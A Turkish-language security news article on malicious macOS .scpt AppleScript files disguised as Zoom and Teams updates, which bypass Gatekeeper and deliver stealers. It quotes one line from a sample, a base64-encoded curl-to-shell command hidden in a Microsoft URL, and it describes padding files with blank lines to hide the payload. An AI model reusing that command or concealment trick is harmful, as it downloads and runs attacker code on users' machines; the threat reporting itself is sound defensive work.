Tehdit aktörleri, Apple’ın sistematik olarak yamaladığı geleneksel saldırı vektörlerinden uzaklaşarak macOS güvenlik kontrollerini atlatmaya yönelik tekniklerini geliştirmeye devam ediyor.
Apple’ın Ağustos 2024’te “sağ tıkla ve aç” Gatekeeper geçersiz kılma özelliğini kaldırmasının ardından saldırganlar, aldatıcı adlandırma kurallarına sahip derlenmiş AppleScript dosyalarını kullanan yeni bir dağıtım mekanizması belirleyip silah haline getirdi.
Bu .scpt dosyalarından, sahte Zoom ve Microsoft Teams yükleyicileri de dahil olmak üzere meşru yazılım güncellemeleri gibi görünen kötü amaçlı yazılımları dağıtmak için giderek daha fazla yararlanılıyor.
Ortaya çıkan tehdit, varsayılan olarak doğrudan Script Editor.app’te açılan .scpt dosyalarına odaklanıyor ve tehdit aktörleri için çekici bir saldırı yüzeyi oluşturuyor.
Kullanıcılar bu dosyalara çift tıkladıklarında uygulama, yürütmeyi teşvik eden sosyal mühendislik istemleri içeren kullanıcı dostu bir arayüz görüntüler.
Kötü amaçlı yazılım operatörleri, gerçek yükü sıradan incelemelerden gizlemek için uzun boş satırların ardından stratejik olarak kötü amaçlı kod yerleştirir.
Basitçe “Çalıştır” düğmesine tıklayarak veya Cmd+R tuşlarına basarak kullanıcılar, Gatekeeper karantina korumaları tarafından işaretlenmiş olsa bile betiği yanlışlıkla çalıştırarak Apple’ın güvenlik mekanizmalarını etkili bir şekilde atlatırlar.
.webp)
Moonlock Laboratuvarları ve Pepe Berba’daki güvenlik analistleri, daha önce gelişmiş kalıcı tehdit operasyonlarında ortaya çıkan karmaşık kampanyaları keşfederek bu tekniğin son aylarda önem kazandığını tespit etti.
Pepe Berba, AppleScript dosyalarının kendileri yeni olmasa da, bu tekniği kullanan örneklerin çoğalmasının, özellikle MacSync Stealer ve Odyssey Stealer gibi ticari amaçlı kötü amaçlı yazılım ailelerinin bu metodolojiyi benimsemesi nedeniyle endişe verici bir eğilimi temsil ettiğini belirtti.
Bu, devlet destekli aktörlerden yaygın siber suç operasyonlarına kadar uzanan ileri tekniklerin klasik bir örneğini temsil ediyor.
Teknik yapı
Bu senaryoların teknik yapısı birçok akıllı aldatma taktiğini kullanır.
Analiz edilen bir örnek, aşağıdaki gibi AppleScript kodunu ortaya çıkarır: set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" ardından do shell script "open -g " & quoted form of teamsSDKURL.
.webp)
Bu komut yapısı, kullanıcıya yasal görünen güncelleme istemleri sunarken arka planda kötü amaçlı URL’leri açar.
Dosya adlarının kendisi, “MSTeamsUpdate.scpt”, “Zoom SDK Update.scpt” ve “Microsoft.TeamsSDK.scpt” gibi değişkenlerle birincil yanıltıcı katman görevi görür.
Bu saldırıların kalıcılığı ve tespitten kaçınma yetenekleri özel ilgiyi hak ediyor.
Pek çok .scpt dosyası şu anda VirusTotal’da sıfır algılama sağlıyor ve güvenlik satıcıları algılama imzalarını uygulamaya koymadan önce saldırganlara önemli bir operasyonel yol sağlıyor.
Dosyalar genellikle kimlik avı e-postaları veya yazılım güncellemeleri sunan, güvenliği ihlal edilmiş web siteleri yoluyla geliyor ve yasal sürüm yükseltmeleri arayan kullanıcıları hedefliyor.
Bu saldırı vektörü, meşru kullanıcıların düzenli olarak etkileşimde bulunduğu yerel sistem araçlarından yararlanırken tanıdık uygulama adlarına olan güveni kötüye kullandığı için macOS güvenliği açısından önemli bir zorluk teşkil ediyor.
Kuruluşlar, kullanıcıları yazılım güncellemelerini resmi kanallar aracılığıyla doğrulama konusunda eğitmeli ve AppleScript yürütme modellerini izleyebilen uç nokta algılama çözümlerini uygulamalıdır.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
